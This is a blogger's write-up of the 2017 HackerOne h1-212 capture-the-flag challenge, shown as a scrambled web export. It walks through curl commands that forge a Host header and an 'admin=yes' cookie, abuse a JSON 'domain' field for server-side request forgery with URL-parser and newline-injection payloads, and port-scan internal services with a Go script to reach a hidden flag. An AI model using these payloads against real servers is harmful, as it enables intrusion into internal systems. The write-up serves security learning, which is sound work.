Hackers, hack your way to NYC this December for h1-212! An engineer of https:\/\/t.co\/xePbcEBVTR<\/a> launched a new server for a new admin panel. He is completely confident that the server can\u2019t be hacked, so he hid a flag. Details: https:\/\/t.co\/WMRQ891idH<\/a>. #TogetherWeHitHarder<\/a><\/p>\n \u2014 Jobert Abma (@jobertabma) November 13, 2017<\/a><\/p><\/blockquote>\n Let’s find that flag!<\/p>\n Or if you would prefer a tweet sized solution:<\/p>\n But I digress. Still here? Cool, lets find this flag and document the snags I hit along the way.<\/p>\n http:\/\/104.236.20.43\/<\/a> greets us with a default Ubuntu install:<\/p>\n This is the last time we will use our web browser for this CTF (curl time!)!<\/p>\n From the originally tweet & blog post — we know to search for an “admin” interface on 104.236.20.43. We should check for “admin” hostnames for sites hosted (and paths, see setback 1 below) on the same server. This technique of hosting multiple sites behind the same IP\/port is called name-based virtual hosting<\/a>.<\/p>\n Checking any hostname returns the Apache2 Ubuntu default page, with the exception of admin.acme.org:<\/p>\n For admin.acme.org we are provided a blank page and a cookie “admin=no”!<\/p>\n Executing a brute force scan of the root directory returns nothing exciting, except a fake flag http:\/\/104.236.20.43\/flag<\/a> –<\/p>\n DNS or other related recon methods will not work as the public acme.org is not associated with this machine.<\/p>\n If we try a few values for the admin cookie, we find the only value that returns anything other than a HTTP 200 return code is “admin=yes”:<\/p>\n At this point, we have a server returning a 405, which is not terribly exciting. At least there were no setbacks with this step \ud83d\ude42<\/p>\n A HTTP 405 response is defined as<\/a>:<\/p>\n The 405 (Method Not Allowed) status code indicates that the method An HTTP Method refers to the verb sent by the client, in the above case this was “GET”, however there are many options available<\/a>. The only method that returns anything different is POST, which can be observed returning a 406 error:<\/p>\n An OPTIONS method with a * request target<\/a> returns an list of allowed methods:<\/p>\n I spent hours trying other HTTP methods as I did not notice that the POST request type returned a 406.<\/p>\n Noticing a theme here yet? \ud83d\ude42<\/p>\n A HTTP 406 response is defined as<\/a>:<\/p>\n The 406 (Not Acceptable) status code indicates that the target A 406 typically refers to the Accept headers sent by a client (see setback 4.a). In our case, since we are sending a POST request which generally contains data, the server is complaining that our data is not correctly formatted. If we send a request with a content type \u201capplication\/json\u201d, we receive this response:<\/p>\n By adding some data, we see that we are missing a domain field:<\/p>\n These errors actually come in as 418 teapot<\/a> responses \ud83c\udf75\ud83c\udf75\ud83c\udf75.<\/p>\n As I thought the 406 header indicated something was missing from my “Accept” HTTP header (implying *\/* was not acceptable), I spent far too long gathering different acceptable Accept media types<\/a>.<\/p>\n Sending domain requests allows us to ascertain the rules regarding the domain that must be followed:<\/p>\n To put this into practice, let’s send a sample request (which will GET \/ from 212.erbbysam.com). Note that this is a 2 step process:<\/p>\n Rule 3 above becomes obvious when the string “localhost:22 @212.example.com” is provided as a domain:<\/p>\n That string may look familiar as it is very similar to php libcurl issues that were observed in one of the best talks to come out of Vegas this year (besides my own \ud83d\ude42 ) – https:\/\/www.blackhat.com\/docs\/us-17\/thursday\/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf<\/a><\/p>\n Aside — Tornado black hole<\/p>\n Hosting a simple python tornado server at 212.erbbysam.com allowed me to reason about what the server’s code actually looked like by observing the requests coming in:<\/p>\n Suspecting that pivoting to something only accessible locally was the next step (while trying all the things\u2122), I setup a simple Go executable to scan every port accessible (similar to port 22 above):<\/p>\n Running this code only produced a few interesting hits:<\/p>\n The 1337 port appears to be running an http server (and it’s hinting that we’re getting close)!<\/p>\n This part is a bit tricky. An intentional “bug” in the domain parsing script meant that a \\n character would split a request into 2 separate reads (incrementing the read.php ID 2x). To demonstrate this, I will make two consecutive calls with a \\n:<\/p>\n In this case read.php?id=2140 will access “localhost:1337\/” while read.php?id=2141 will access “212.example.com”. This allows us to access localhost:1337\/flag and grab our flag while still satisfying the domain rules from step 5!<\/p>\n Using the python tornado server above, I observed that any unicode character (as \\uXXXX where X is a hex character) could be passed through the server (with the exception of the character list in part 5). This is due to the use of json encoding<\/a>, but was entirely unused here.<\/p>\n I could not figure out why my request would disappear when a \\n was passed in (no error appeared and no domain was contacted). My breakthrough here came when I tried the domain “212.erbbysam.com:80\/flag\\n212.erbbysam.com” and a GET \/ was accessed by the ID that was returned, I then noticed the ID had incremented twice (1st ID would GET \/flag, 2nd ID — the value returned — would get \/).<\/p>\n In conclusion, never stop trying all the things\u2122 and always be on the lookout for interesting papers and presentations (I’m not sure if I would have finished this without knowing about that Black Hat URL parser presentation).<\/p>\n Taking the curl requests from step 7, creating a few temporary bash variables and changing “localhost” to “0” we reduce this CTF to proper tweet form (277 characters):<\/p>\n Huge shout-out to @NahamSec <\/a>and @jobertama<\/a> for this awesome challenge & thanks for reading \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":" As with most problems in the world, this one started with a tweet: Hackers, hack your way to NYC this December for h1-212! An engineer of https:\/\/t.co\/xePbcEBVTR launched a new server for a new admin panel. He is completely confident that the server can\u2019t be hacked, so he hid a flag. Details: https:\/\/t.co\/WMRQ891idH. #TogetherWeHitHarder \u2014 … <\/p>\nTLDR<\/h2>\n
\n# step 0\ncurl -v http:\/\/104.236.20.43\/\n# step 1 \ncurl -v http:\/\/104.236.20.43\/ -H 'Host: admin.acme.org'\n# step 2\ncurl -v http:\/\/104.236.20.43\/ -H 'Host: admin.acme.org' --cookie 'admin=yes'\n# step 3\ncurl -v http:\/\/104.236.20.43\/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST\n# step 4\ncurl http:\/\/104.236.20.43\/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H \"Content-Type: application\/json\" -d '{}'\n# step 5\ncurl http:\/\/104.236.20.43\/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H \"Content-Type: application\/json\" -d '{\"domain\":\"localhost:22 @212.example.com\"}'\ncurl -s http:\/\/104.236.20.43\/read.php?id=(RETURNED ID) -H 'Host: admin.acme.org' --cookie 'admin=yes' | jq -r '.data' | base64 -d\n#step 6 \ncurl http:\/\/104.236.20.43\/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H \"Content-Type: application\/json\" -d '{\"domain\":\"localhost:1337 @212.example.com\"}'\ncurl -s http:\/\/104.236.20.43\/read.php?id=(RETURNED ID) -H 'Host: admin.acme.org' --cookie 'admin=yes' | jq -r '.data' | base64 -d\n# step 7\ncurl http:\/\/104.236.20.43\/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H \"Content-Type: application\/json\" -d '{\"domain\":\"localhost:1337\/flag\\n212.example.com\"}'\ncurl -s http:\/\/104.236.20.43\/read.php?id=(RETURNED ID - 1) -H 'Host: admin.acme.org' --cookie 'admin=yes' | jq -r '.data' | base64 -d\n# step 7, output\nFLAG: CF,2dsV\\\/]fRAYQ.TDEp`w\"M(%mU;p9+9FD{Z48X*Jtt{%vS($g7\\S):f%=P[Y@nka=<tqhnF<aq=K5:BC@Sb*{[%z\"+@yPb\/nfFna<e$hv{p8r2[vMMF52y:z\/Dh;{6\n<\/code><\/pre>\nH=\"Host: admin.acme.org\";B=\"admin=yes\";curl 104.236.20.43\/read.php?id=$(expr $(curl 104.236.20.43\/index.php -s -H \"$H\" -b \"$B\" -d '{\"domain\":\"0:1337\/flag\\n212.h.com\"}' -H \"Content-Type: application\/json\"|sed 's\/.*=\\(.*\\)\\\"}\/\\1\/') - 1) -s -H \"$H\" -b \"$B\"|jq -r '.data'|base64 -d<\/code><\/pre>\nStep 1 — Virtual hosting<\/h2>\n
![\"default\"](\"https:\/\/erbbysam.files.wordpress.com\/2017\/11\/default.png\")
<\/p>\nubuntu@client:~$ curl -v http:\/\/104.236.20.43\/ -H 'Host: admin.acme.org'\n* Trying 104.236.20.43...\n* TCP_NODELAY set\n* Connected to 104.236.20.43 (104.236.20.43) port 80 (#0)\n> GET \/ HTTP\/1.1\n> Host: admin.acme.org\n> User-Agent: curl\/7.54.0\n> Accept: *\/*\n> \n< HTTP\/1.1 200 OK\n< Date: Fri, 17 Nov 2017 23:30:19 GMT\n< Server: Apache\/2.4.18 (Ubuntu)\n< Set-Cookie: admin=no\n< Content-Length: 0\n< Content-Type: text\/html; charset=UTF-8\n< \n<\/code><\/pre>\nSetback 1.a — Brute force<\/h3>\n
![\"\"](\"http:\/\/blog.erbbysam.com\/wp-content\/uploads\/2017\/11\/dirsearch.png\")
<\/p>\nStep 2 — admin=yes<\/h2>\n
ubuntu@client:~$ curl -v http:\/\/104.236.20.43\/ -H 'Host: admin.acme.org' --cookie 'admin=yes'\n* Trying 104.236.20.43...\n* TCP_NODELAY set\n* Connected to 104.236.20.43 (104.236.20.43) port 80 (#0)\n> GET \/ HTTP\/1.1\n> Host: admin.acme.org\n> User-Agent: curl\/7.54.0\n> Accept: *\/*\n> Cookie: admin=yes\n> \n< HTTP\/1.1 405 Method Not Allowed\n< Date: Sat, 18 Nov 2017 00:25:51 GMT\n< Server: Apache\/2.4.18 (Ubuntu)\n< Content-Length: 0\n< Content-Type: text\/html; charset=UTF-8\n< \n<\/code><\/pre>\nStep 3 — What is a 405?<\/h2>\n
\nreceived in the request-line is known by the origin server but not
\nsupported by the target resource. The origin server MUST generate an
\nAllow header field in a 405 response containing a list of the target
\nresource’s currently supported methods.<\/p><\/blockquote>\nubuntu@client:~$ curl -v http:\/\/104.236.20.43\/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST\n* Trying 104.236.20.43...\n* TCP_NODELAY set\n* Connected to 104.236.20.43 (104.236.20.43) port 80 (#0)\n> POST \/ HTTP\/1.1\n> Host: admin.acme.org\n> User-Agent: curl\/7.54.0\n> Accept: *\/*\n> Cookie: admin=yes\n> \n< HTTP\/1.1 406 Not Acceptable\n< Date: Sat, 18 Nov 2017 00:37:46 GMT\n< Server: Apache\/2.4.18 (Ubuntu)\n< Content-Length: 0\n< Content-Type: text\/html; charset=UTF-8\n< \n<\/code><\/pre>\nAside — HTTP OPTIONS<\/h3>\n
ubuntu@client:~$ curl -v http:\/\/104.236.20.43\/* -H 'Host: admin.acme.org' --cookie 'admin=yes' -X OPTIONS 2>&1 | grep Allow\n< Allow: GET,HEAD,POST,OPTIONS\n<\/code><\/pre>\nSetback 3.a — 405 vs 406<\/h3>\n
Step 4 — What is a 406?<\/h2>\n
\nresource does not have a current representation that would be
\nacceptable to the user agent, according to the proactive negotiation
\nheader fields received in the request (Section 5.3), and the server
\nis unwilling to supply a default representation.<\/p><\/blockquote>\nubuntu@client:~$ curl http:\/\/104.236.20.43\/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H \"Content-Type: application\/json\"\n{\"error\":{\"body\":\"unable to decode\"}}\n<\/code><\/pre>\nubuntu@client:~$ curl http:\/\/104.236.20.43\/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H \"Content-Type: application\/json\" -d '{}'\n{\"error\":{\"domain\":\"required\"}}\n<\/code><\/pre>\nSetback 4.a — Accept all the things<\/h3>\n
Step 5 — Domains<\/h2>\n
\n
\nubuntu@client:~$ curl http:\/\/104.236.20.43\/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H \"Content-Type: application\/json\" -d '{\"domain\":\"212.erbbysam.com\"}'\n{\"next\":\"\\\/read.php?id=2150\"}\nubuntu@client:~$ curl -s http:\/\/104.236.20.43\/read.php?id=2150 -H 'Host: admin.acme.org' --cookie 'admin=yes'\n{\"data\":\"(base64 data removed)\"}\n<\/code><\/pre>\nubuntu@client:~$ curl http:\/\/104.236.20.43\/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H \"Content-Type: application\/json\" -d '{\"domain\":\"localhost:22 @212.example.com\"}'\n{\"next\":\"\\\/read.php?id=97\"}\nubuntu@client:~$ curl -s http:\/\/104.236.20.43\/read.php?id=97 -H 'Host: admin.acme.org' --cookie 'admin=yes' | jq -r '.data' | base64 -d\nSSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2\nProtocol mismatch.\n<\/code><\/pre>\nimport tornado.ioloop\nimport tornado.web\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n print self.request\n\ndef make_app():\n return tornado.web.Application([\n (r\"\/.*\", MainHandler),\n ])\n\nif __name__ == \"__main__\":\n app = make_app()\n app.listen(80)\n tornado.ioloop.IOLoop.current().start()\n<\/code><\/pre>\nStep 6 — Internal network scan<\/h2>\n
package main\n\nimport \"fmt\"\nimport \"os\/exec\"\nimport \"strings\"\nimport \"strconv\"\n\nfunc Cmd(cmd string) []byte {\n out, err := exec.Command(\"bash\", \"-c\", cmd).Output()\n if err != nil {\n fmt.Printf(\"error -- %s\\n\", cmd)\n }\n return out\n}\n\nfunc main() {\n port := 0\n for port < 65535 {\n fmt.Printf(\"%d -- \", port)\n cmd := fmt.Sprintf(\"curl http:\/\/admin.acme.org\/index.php --header 'Host: admin.acme.org' --cookie 'admin=yes' -v -X POST -d '{\\\"domain\\\":\\\"localhost:%d @212.example.com\\\"}' -H 'Content-Type: application\/json' --max-time 10 \", port)\n out := string(Cmd(cmd))\n out = strings.TrimLeft(strings.TrimRight(out,\"\\\"}\"),\"{\\\"next\\\":\\\"\\\\\/read.php?id=\")\n num_out, err := strconv.Atoi(out)\n\n if err == nil {\n cmd = fmt.Sprintf(\"curl http:\/\/104.236.20.43\/read.php?id=%d --header 'Host: admin.acme.org' --cookie \\\"admin=yes\\\" -v --max-time 10 \" ,num_out)\n out = string(Cmd(cmd))\n fmt.Println(out)\n\n } else {\n fmt.Println(\"invalid\")\n }\n port = port + 1\n }\n}\n<\/code><\/pre>\nubuntu@client:~\/go\/scan$ go run test.go\n...\n22 -- {\"data\":\"U1NILTIuMC1PcGVuU1NIXzcuMnAyIFVidW50dS00dWJ1bnR1Mi4yDQpQcm90b2NvbCBtaXNtYXRjaC4K\"} (SSH example above)\n53 -- error (local dns server)\n80 -- {\"data\":\"CjwhRE9DVFlQRSBodG1sIFBVQkxJQ... (default ubuntu page)\n1337 -- {\"data\":\"SG1tLCB3aGVyZSB3b3VsZCBpdCBiZT8K\"} (\"Hmm, where would it be?\")\n<\/code><\/pre>\nStep 7 — Reaching \/flag on 1337<\/h2>\n
ubuntu@client:~$ curl http:\/\/104.236.20.43\/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H \"Content-Type: application\/json\" -d '{\"domain\":\"localhost:80\/\\n212.h.com\"}'\n{\"next\":\"\\\/read.php?id=2139\"}\nubuntu@client:~$ curl http:\/\/104.236.20.43\/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H \"Content-Type: application\/json\" -d '{\"domain\":\"localhost:1337\/\\n212.example.com\"}'\n{\"next\":\"\\\/read.php?id=2141\"}\n<\/code><\/pre>\nubuntu@client:~$ curl http:\/\/104.236.20.43\/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H \"Content-Type: application\/json\" -d '{\"domain\":\"localhost:1337\/flag\\n212.example.com\"}'\n{\"next\":\"\\\/read.php?id=2143\"}\nubuntu@client:~$ curl -s http:\/\/104.236.20.43\/read.php?id=2142 -H 'Host: admin.acme.org' --cookie 'admin=yes' | jq -r '.data' | base64 -d\nFLAG: CF,2dsV\\\/]fRAYQ.TDEp`w\"M(%mU;p9+9FD{Z48X*Jtt{%vS($g7\\S):f%=P[Y@nka=<tqhnF<aq=K5:BC@Sb*{[%z\"+@yPb\/nfFna<e$hv{p8r2[vMMF52y:z\/Dh;{6\n<\/code><\/pre>\nSetback 7.a — Unicode characters<\/h3>\n
Setback 7.b — \\n<\/h3>\n
Conclusion<\/h2>\n
H=\"Host: admin.acme.org\";B=\"admin=yes\";curl 104.236.20.43\/read.php?id=$(expr $(curl 104.236.20.43\/index.php -s -H \"$H\" -b \"$B\" -d '{\"domain\":\"0:1337\/flag\\n212.h.com\"}' -H \"Content-Type: application\/json\"|sed 's\/.*=\\(.*\\)\\\"}\/\\1\/') - 1) -s -H \"$H\" -b \"$B\"|jq -r '.data'|base64 -d<\/code><\/pre>\n